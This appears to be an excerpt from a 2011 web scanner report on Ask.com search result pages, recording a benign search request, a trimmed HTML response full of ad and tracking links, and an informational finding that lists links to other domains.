http://www.google.com/aclk?sa=l&ai=CH3QF6sNBTcqYM4q5gwe2lOWKD_qnusUBmrGbpxWuyOkEEAMg-_6BAygFUKGOuKkDYMmGo4fUo4AQoAGlvYb_A8gBAaoEIU_Q3nJftgvADHBEaXK2apQqUPLNZZd4-2sHw8qRbY0UYw&num=3&sig=AGiWqtzMWw8zTK0H6jYLKVkE3iWwOAMuAg&adurl=http://www.local.com/results.aspx%3Fkeyword%3Dweather%26cid%3D1265%26location%3DWashington%2BDC
http://www.google.com/aclk?sa=l&ai=CwBPm6sNBTcqYM4q5gwe2lOWKD_-UtNgB19PHzhXaiekEEAEg-_6BAygFUJDfusgHYMmGo4fUo4AQoAHRxuDzA8gBAaoEHk_QngpatgnADHBEIXIgSGz8YWrwq3EvKGjKLMwzVg&num=1&sig=AGiWqtwTi-StMRf57U2R-PcQIXMhjmsLRA&adurl=http://track.searchignite.com/si/cm/tracking/clickredirect.aspx%3Fsicontent%3D0%26sicreative%3D5712315807%26sitrackingid%3D157750541
http://www.lyricsmode.com/lyrics/k/katie_melua/i_think_its_going_to_rain_today.html
http://www.lyricsmode.com/lyrics/u/ub40/i_think_its_going_to_rain_today.html
http://www.raintoday.co.uk/
http://www.ultimate-guitar.com/tabs/k/katie_melua/i_think_its_going_to_rain_today_crd.htm

Request

GET /web?q=Is+it+going+to+rain%3F&qsrc=3195 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:13:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: gcc=RW50ZXJ0YWlubWVudC9UVi9UVl9OZXR3b3Jrcw..; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:13:46 GMT; Path=/
Set-Cookie: clc=RW50ZXJ0YWlubWVudC9UVi9UVl9OZXR3b3Jrcw..; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:13:46 GMT; Path=/
Set-Cookie: ldst=sorg=-1|1296155626806; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:46 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:46 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-SXMraXQrZ29pbmcrdG8rcmFpbiUzRg..; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjQ2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:46 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:46 GMT; Path=/
Set-Cookie: qc=1; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:46 GMT; Path=/
Content-Length: 133620

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

<title>Ask.com - Wha
...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q=Is+it+going+to+rain%3F"
class="txt3 b" style="">Shopping</a>
...[SNIP]...
<td colspan="4" style="padding-bottom:6px">

<a class="txt_lg title" href="http://ask.weather.com/outlook/local/75201?par=iac&site=www.ask.com&promo=0&cm_ven=IAC&cm_cat=www.ask.com&cm_pla=smartanswers-us&cm_ite=wx-cc" onmousedown="pk(this,{en:'da',io:'0',b:'a001',tp:'51',ec:'4',url:'http%3A%2F%2Fask.weather.com%2Foutlook%2Flocal%2F75201%3Fpar%3Diac%26site%3Dwww.ask.com%26promo%3D0%26cm_ven%3DIAC%26cm_cat%3Dwww.ask.com%26cm_pla%3Dsmartanswers-us%26cm_ite%3Dwx-cc'})">
<span>
...[SNIP]...
<span style="white-space:nowrap">

<a class="txt3 title" href="http://ask.weather.com/weather/hourbyhour/75201?par=iac&site=www.ask.com&promo=0&cm_ven=IAC&cm_cat=www.ask.com&cm_pla=smartanswers-us&cm_ite=wx-hbh" onmousedown="pk(this,{en:'da',io:'2',b:'a001',tp:'51',ec:'4',url:'http%3A%2F%2Fask.weather.com%2Fweather%2Fhourbyhour%2F75201%3Fpar%3Diac%26site%3Dwww.ask.com%26promo%3D0%26cm_ven%3DIAC%26cm_cat%3Dwww.ask.com%26cm_pla%3Dsmartanswers-us%26cm_ite%3Dwx-hbh'})">Hour by Hour</a>
...[SNIP]...
<span style="white-space:nowrap">

<a class="txt3 title" href="http://ask.weather.com/weather/tenday/75201?par=iac&site=www.ask.com&promo=0&cm_ven=IAC&cm_cat=www.ask.com&cm_pla=smartanswers-us&cm_ite=wx-tenday" onmousedown="pk(this,{en:'da',io:'3',b:'a001',tp:'51',ec:'4',url:'http%3A%2F%2Fask.weather.com%2Fweather%2Ftenday%2F75201%3Fpar%3Diac%26site%3Dwww.ask.com%26promo%3D0%26cm_ven%3DIAC%26cm_cat%3Dwww.ask.com%26cm_pla%3Dsmartanswers-us%26cm_ite%3Dwx-tenday'})">10 Day Forecast</a>
...[SNIP]...
<span style="white-space:nowrap">

<a class="txt3 title" href="http://ask.weather.com/weather/map/interactive/75201?par=iac&site=www.ask.com&promo=0&cm_ven=IAC&cm_cat=www.ask.com&cm_pla=smartanswers-us&cm_ite=iRadar" onmousedown="pk(this,{en:'da',io:'4',b:'a001',tp:'51',ec:'4',url:'http%3A%2F%2Fask.weather.com%2Fweather%2Fmap%2Finteractive%2F75201%3Fpar%3Diac%26site%3Dwww.ask.com%26promo%3D0%26cm_ven%3DIAC%26cm_cat%3Dwww.ask.com%26cm_pla%3Dsmartanswers-us%26cm_ite%3DiRadar'})">Interactive Radar Map</a>
...[SNIP]...

<img src="http://4.afs.googleadservices.com/images/partners/CMq12P2L26YCFYrc4AodNkpZ8Q/aj-cat.png" style="display:none;" height="1px" width="1px" alt=""/>

<span class="T7 fr tp info txt0">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CwBPm6sNBTcqYM4q5gwe2lOWKD_-UtNgB19PHzhXaiekEEAEg-_6BAygFUJDfusgHYMmGo4fUo4AQoAHRxuDzA8gBAaoEHk_QngpatgnADHBEIXIgSGz8YWrwq3EvKGjKLMwzVg&num=1&sig=AGiWqtwTi-StMRf57U2R-PcQIXMhjmsLRA&adurl=http://track.searchignite.com/si/cm/tracking/clickredirect.aspx%3Fsicontent%3D0%26sicreative%3D5712315807%26sitrackingid%3D157750541" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(57); if (typeof efclk != 'undefined') efclk(57); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D51a5oT-UDS%26sgch%3D646cHA'},'gg_0');" class="nu" onmouseover="return ss('instantweatherforecast.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_0" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=CwBPm6sNBTcqYM4q5gwe2lOWKD_-UtNgB19PHzhXaiekEEAEg-_6BAygFUJDfusgHYMmGo4fUo4AQoAHRxuDzA8gBAaoEHk_QngpatgnADHBEIXIgSGz8YWrwq3EvKGjKLMwzVg&num=1&sig=AGiWqtwTi-StMRf57U2R-PcQIXMhjmsLRA&adurl=http://track.searchignite.com/si/cm/tracking/clickredirect.aspx%3Fsicontent%3D0%26sicreative%3D5712315807%26sitrackingid%3D157750541" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(57); if (typeof efclk != 'undefined') efclk(57); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D51a5oT-UDS%26sgch%3D646cHA'},'gg_0');" class="nu" onmouseover="return ss('instantweatherforecast.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CLfCb6sNBTcqYM4q5gwe2lOWKD6jnhcUBuLK46xjY9ecMEAIg-_6BAygFUOHBm-gHYMmGo4fUo4AQyAEBqQLk-rgrfNawPqoEHk_QrmEYtgrADHBEIXJpFnboYWrwq3EvKGjKLMwzVg&num=2&sig=AGiWqtwf3W1TlGdFXwoA1ehImPWh0iZvBQ&adurl=http://na.link.decdna.net/n/63605/103595/www.ontariotravel.net/1htg5j9%3B11%3B4%3B%3B8%3B7l30%3Bamv080%3Bgj97x%3B%3Bgvzap%3Bcak%3B1%3B/i/c%3F0%26pq%3D%252fTCISSegmentsWeb%252fmain%252eportal%253fsetlanguage%253dEN%26247cr%3D6573809568%26247subproduct%3DSEARCH" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(27); if (typeof efclk != 'undefined') efclk(27); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D51a5oT-UDS%26sgch%3D646cHA'},'gg_1');" class="nu" onmouseover="return ss('ontariotravel.net')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_1" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CLfCb6sNBTcqYM4q5gwe2lOWKD6jnhcUBuLK46xjY9ecMEAIg-_6BAygFUOHBm-gHYMmGo4fUo4AQyAEBqQLk-rgrfNawPqoEHk_QrmEYtgrADHBEIXJpFnboYWrwq3EvKGjKLMwzVg&num=2&sig=AGiWqtwf3W1TlGdFXwoA1ehImPWh0iZvBQ&adurl=http://na.link.decdna.net/n/63605/103595/www.ontariotravel.net/1htg5j9%3B11%3B4%3B%3B8%3B7l30%3Bamv080%3Bgj97x%3B%3Bgvzap%3Bcak%3B1%3B/i/c%3F0%26pq%3D%252fTCISSegmentsWeb%252fmain%252eportal%253fsetlanguage%253dEN%26247cr%3D6573809568%26247subproduct%3DSEARCH" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(27); if (typeof efclk != 'undefined') efclk(27); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D51a5oT-UDS%26sgch%3D646cHA'},'gg_1');" class="nu" onmouseover="return ss('ontariotravel.net')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CH3QF6sNBTcqYM4q5gwe2lOWKD_qnusUBmrGbpxWuyOkEEAMg-_6BAygFUKGOuKkDYMmGo4fUo4AQoAGlvYb_A8gBAaoEIU_Q3nJftgvADHBEaXK2apQqUPLNZZd4-2sHw8qRbY0UYw&num=3&sig=AGiWqtzMWw8zTK0H6jYLKVkE3iWwOAMuAg&adurl=http://www.local.com/results.aspx%3Fkeyword%3Dweather%26cid%3D1265%26location%3DWashington%2BDC" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(44); if (typeof efclk != 'undefined') efclk(44); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D51a5oT-UDS%26sgch%3D646cHA'},'gg_2');" class="nu" onmouseover="return ss('local.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_2" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=CH3QF6sNBTcqYM4q5gwe2lOWKD_qnusUBmrGbpxWuyOkEEAMg-_6BAygFUKGOuKkDYMmGo4fUo4AQoAGlvYb_A8gBAaoEIU_Q3nJftgvADHBEaXK2apQqUPLNZZd4-2sHw8qRbY0UYw&num=3&sig=AGiWqtzMWw8zTK0H6jYLKVkE3iWwOAMuAg&adurl=http://www.local.com/results.aspx%3Fkeyword%3Dweather%26cid%3D1265%26location%3DWashington%2BDC" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(44); if (typeof efclk != 'undefined') efclk(44); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D51a5oT-UDS%26sgch%3D646cHA'},'gg_2');" class="nu" onmouseover="return ss('local.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CxMgu6sNBTcqYM4q5gwe2lOWKD_e89qEBgfyUgw60x-IEEAQg-_6BAygFUNChosQHYMmGo4fUo4AQyAEBqgQhT9D-EnO2DMAMcERpcrZqlBUgnt5ll3j7awfDypFtjRRj&num=4&sig=AGiWqtzur8rggIC2_JpqkZ4eCLwBfMZqog&adurl=http://www.nowaktours.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(88); if (typeof efclk != 'undefined') efclk(88); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D51a5oT-UDS%26sgch%3D646cHA'},'gg_3');" class="nu" onmouseover="return ss('www.nowaktours.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_3" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CxMgu6sNBTcqYM4q5gwe2lOWKD_e89qEBgfyUgw60x-IEEAQg-_6BAygFUNChosQHYMmGo4fUo4AQyAEBqgQhT9D-EnO2DMAMcERpcrZqlBUgnt5ll3j7awfDypFtjRRj&num=4&sig=AGiWqtzur8rggIC2_JpqkZ4eCLwBfMZqog&adurl=http://www.nowaktours.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(88); if (typeof efclk != 'undefined') efclk(88); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D51a5oT-UDS%26sgch%3D646cHA'},'gg_3');" class="nu" onmouseover="return ss('www.nowaktours.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...
<div id="r_t1"><a onmousedown="return pk(this,{en:'afd',io:'0',b:'a002',tp:'d',ec:'1'})" href="http://www.associatedcontent.com/article/5524366/is_it_going_to_rain.html" class="title txt_lg" ><b>
...[SNIP]...
<div id="r_t2"><a onmousedown="return pk(this,{en:'af',io:'0',b:'a003',tp:'d',ec:'1'})" href="http://answers.yahoo.com/question/index?qid=20081004154711AAi5aHz" class="title txt_lg" ><b>
...[SNIP]...
<td>

<a id="r4_t" href="http://goingtorain.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a005',tp:'d',ec:'1',ex:'tsrc%3Dvnru'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r5_t" href="http://isitgoingtoraintoday.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a006',tp:'d',ec:'1',ex:'tsrc%3Dlxlx'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r6_t" href="http://www.raintoday.co.uk/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a007',tp:'d',ec:'1',ex:'tsrc%3Dlxlx'},'false',0)" class="title txt_lg" target="_blank" >Will it <b>
...[SNIP]...
<td>

<a id="r7_t" href="http://www.lyricsmode.com/lyrics/k/katie_melua/i_think_its_going_to_rain_today.html"
onmousedown="return fp(this,{en:'te',io:'0',b:'a008',tp:'d',ec:'1',ex:'tsrc%3Dlxlx'},'false',0)" class="title txt_lg" target="_blank" >Katie Melua - I Think <b>
...[SNIP]...
<td>

<a id="r8_t" href="http://www.lyricsmode.com/lyrics/u/ub40/i_think_its_going_to_rain_today.html"
onmousedown="return fp(this,{en:'in',io:'0',b:'a009',tp:'d',ec:'1',ex:'tsrc%3Dlxlx'},'false',0)" class="title txt_lg" target="_blank" >Ub40 - I Think It's <b>
...[SNIP]...
<td>

<a id="r9_t" href="http://www.ultimate-guitar.com/tabs/k/katie_melua/i_think_its_going_to_rain_today_crd.htm"
onmousedown="return fp(this,{en:'te',io:'0',b:'a010',tp:'d',ec:'1',ex:'tsrc%3Dlxlx'},'false',0)" class="title txt_lg" target="_blank" >I Think <b>
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CwBPm6sNBTcqYM4q5gwe2lOWKD_-UtNgB19PHzhXaiekEEAEg-_6BAygFUJDfusgHYMmGo4fUo4AQoAHRxuDzA8gBAaoEHk_QngpatgnADHBEIXIgSGz8YWrwq3EvKGjKLMwzVg&num=1&sig=AGiWqtwTi-StMRf57U2R-PcQIXMhjmsLRA&adurl=http://track.searchignite.com/si/cm/tracking/clickredirect.aspx%3Fsicontent%3D0%26sicreative%3D5712315807%26sitrackingid%3D157750541" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(2); if (typeof efclk != 'undefined') efclk(2); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D51a5oT-UDS%26sgch%3D646cHA'},'gg_0');" class="nu" onmouseover="return ss('instantweatherforecast.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_0" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=CwBPm6sNBTcqYM4q5gwe2lOWKD_-UtNgB19PHzhXaiekEEAEg-_6BAygFUJDfusgHYMmGo4fUo4AQoAHRxuDzA8gBAaoEHk_QngpatgnADHBEIXIgSGz8YWrwq3EvKGjKLMwzVg&num=1&sig=AGiWqtwTi-StMRf57U2R-PcQIXMhjmsLRA&adurl=http://track.searchignite.com/si/cm/tracking/clickredirect.aspx%3Fsicontent%3D0%26sicreative%3D5712315807%26sitrackingid%3D157750541" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(2); if (typeof efclk != 'undefined') efclk(2); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D51a5oT-UDS%26sgch%3D646cHA'},'gg_0');" class="nu" onmouseover="return ss('instantweatherforecast.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CLfCb6sNBTcqYM4q5gwe2lOWKD6jnhcUBuLK46xjY9ecMEAIg-_6BAygFUOHBm-gHYMmGo4fUo4AQyAEBqQLk-rgrfNawPqoEHk_QrmEYtgrADHBEIXJpFnboYWrwq3EvKGjKLMwzVg&num=2&sig=AGiWqtwf3W1TlGdFXwoA1ehImPWh0iZvBQ&adurl=http://na.link.decdna.net/n/63605/103595/www.ontariotravel.net/1htg5j9%3B11%3B4%3B%3B8%3B7l30%3Bamv080%3Bgj97x%3B%3Bgvzap%3Bcak%3B1%3B/i/c%3F0%26pq%3D%252fTCISSegmentsWeb%252fmain%252eportal%253fsetlanguage%253dEN%26247cr%3D6573809568%26247subproduct%3DSEARCH" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(79); if (typeof efclk != 'undefined') efclk(79); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D51a5oT-UDS%26sgch%3D646cHA'},'gg_1');" class="nu" onmouseover="return ss('ontariotravel.net')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_1" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CLfCb6sNBTcqYM4q5gwe2lOWKD6jnhcUBuLK46xjY9ecMEAIg-_6BAygFUOHBm-gHYMmGo4fUo4AQyAEBqQLk-rgrfNawPqoEHk_QrmEYtgrADHBEIXJpFnboYWrwq3EvKGjKLMwzVg&num=2&sig=AGiWqtwf3W1TlGdFXwoA1ehImPWh0iZvBQ&adurl=http://na.link.decdna.net/n/63605/103595/www.ontariotravel.net/1htg5j9%3B11%3B4%3B%3B8%3B7l30%3Bamv080%3Bgj97x%3B%3Bgvzap%3Bcak%3B1%3B/i/c%3F0%26pq%3D%252fTCISSegmentsWeb%252fmain%252eportal%253fsetlanguage%253dEN%26247cr%3D6573809568%26247subproduct%3DSEARCH" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(79); if (typeof efclk != 'undefined') efclk(79); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D51a5oT-UDS%26sgch%3D646cHA'},'gg_1');" class="nu" onmouseover="return ss('ontariotravel.net')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CH3QF6sNBTcqYM4q5gwe2lOWKD_qnusUBmrGbpxWuyOkEEAMg-_6BAygFUKGOuKkDYMmGo4fUo4AQoAGlvYb_A8gBAaoEIU_Q3nJftgvADHBEaXK2apQqUPLNZZd4-2sHw8qRbY0UYw&num=3&sig=AGiWqtzMWw8zTK0H6jYLKVkE3iWwOAMuAg&adurl=http://www.local.com/results.aspx%3Fkeyword%3Dweather%26cid%3D1265%26location%3DWashington%2BDC" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(69); if (typeof efclk != 'undefined') efclk(69); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D51a5oT-UDS%26sgch%3D646cHA'},'gg_2');" class="nu" onmouseover="return ss('local.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_2" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=CH3QF6sNBTcqYM4q5gwe2lOWKD_qnusUBmrGbpxWuyOkEEAMg-_6BAygFUKGOuKkDYMmGo4fUo4AQoAGlvYb_A8gBAaoEIU_Q3nJftgvADHBEaXK2apQqUPLNZZd4-2sHw8qRbY0UYw&num=3&sig=AGiWqtzMWw8zTK0H6jYLKVkE3iWwOAMuAg&adurl=http://www.local.com/results.aspx%3Fkeyword%3Dweather%26cid%3D1265%26location%3DWashington%2BDC" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(69); if (typeof efclk != 'undefined') efclk(69); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D51a5oT-UDS%26sgch%3D646cHA'},'gg_2');" class="nu" onmouseover="return ss('local.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CxMgu6sNBTcqYM4q5gwe2lOWKD_e89qEBgfyUgw60x-IEEAQg-_6BAygFUNChosQHYMmGo4fUo4AQyAEBqgQhT9D-EnO2DMAMcERpcrZqlBUgnt5ll3j7awfDypFtjRRj&num=4&sig=AGiWqtzur8rggIC2_JpqkZ4eCLwBfMZqog&adurl=http://www.nowaktours.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(83); if (typeof efclk != 'undefined') efclk(83); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D51a5oT-UDS%26sgch%3D646cHA'},'gg_3');" class="nu" onmouseover="return ss('www.nowaktours.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_3" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CxMgu6sNBTcqYM4q5gwe2lOWKD_e89qEBgfyUgw60x-IEEAQg-_6BAygFUNChosQHYMmGo4fUo4AQyAEBqgQhT9D-EnO2DMAMcERpcrZqlBUgnt5ll3j7awfDypFtjRRj&num=4&sig=AGiWqtzur8rggIC2_JpqkZ4eCLwBfMZqog&adurl=http://www.nowaktours.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(83); if (typeof efclk != 'undefined') efclk(83); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D51a5oT-UDS%26sgch%3D646cHA'},'gg_3');" class="nu" onmouseover="return ss('www.nowaktours.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=Cv9Su6sNBTcqYM4q5gwe2lOWKD87C3ha27Z_cAtj15wwQBSD7_oEDKAVQz-u07gNgyYajh9SjgBDIAQGqBBtP0M51drYNwAxwRGlytnuV36-Mp3hy4sduaBc&num=5&sig=AGiWqtywlF7JSyjS8g_uXcHn2SPP6DEN2g&adurl=http://www.cinderellatravel.com/visas_kazakhstan.php" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(29); if (typeof efclk != 'undefined') efclk(29); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D51a5oT-UDS%26sgch%3D646cHA'},'gg_4');" class="nu" onmouseover="return ss('www.cinderellatravel.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_4" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=Cv9Su6sNBTcqYM4q5gwe2lOWKD87C3ha27Z_cAtj15wwQBSD7_oEDKAVQz-u07gNgyYajh9SjgBDIAQGqBBtP0M51drYNwAxwRGlytnuV36-Mp3hy4sduaBc&num=5&sig=AGiWqtywlF7JSyjS8g_uXcHn2SPP6DEN2g&adurl=http://www.cinderellatravel.com/visas_kazakhstan.php" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(29); if (typeof efclk != 'undefined') efclk(29); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D51a5oT-UDS%26sgch%3D646cHA'},'gg_4');" class="nu" onmouseover="return ss('www.cinderellatravel.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...

<a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=;u4=;u3=;u2=0;ord=-997501698?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

12.23. http://www.ask.com/web previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/web

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/web?q=Is+there+lead+in+reusable+grocery+bags%3F&gc=1&qsrc=3066&o=0&l=dir

The response contains the following links to other domains:

http://66.235.120.67/e?t=4583401241928196370
http://abcnews.go.com/Business/wireStory?id=12143990
http://api.recaptcha.net/js/recaptcha_ajax.js
http://ask.pronto.com/user/search.do?&q=Is+there+lead+in+reusable+grocery+bags%3F
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://c.moreover.com/click/here.pl?z3976099917&z=1250248829
http://c.moreover.com/click/here.pl?z3983099646&z=1250248841
http://c.moreover.com/click/here.pl?z3983155500&z=1250248829
http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=;u4=;u3=;u2=0;ord=-1351412874?
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://spiderx.wordpress.com/
http://www.digtriad.com/news/local_state/article.aspx?storyid=150621
http://www.green-kits.com/
http://www.ityse.com/
http://www.msnbc.msn.com/id/40139816/ns/us_news-environment/
http://www.nydailynews.com/ny_local/2010/11/15/2010-11-15_reusable_grocery_bags_made_in_china_found_to_contain_lead_fueling_calls_for_fda_.html
http://www.nytimes.com/2010/11/15/nyregion/15bags.html
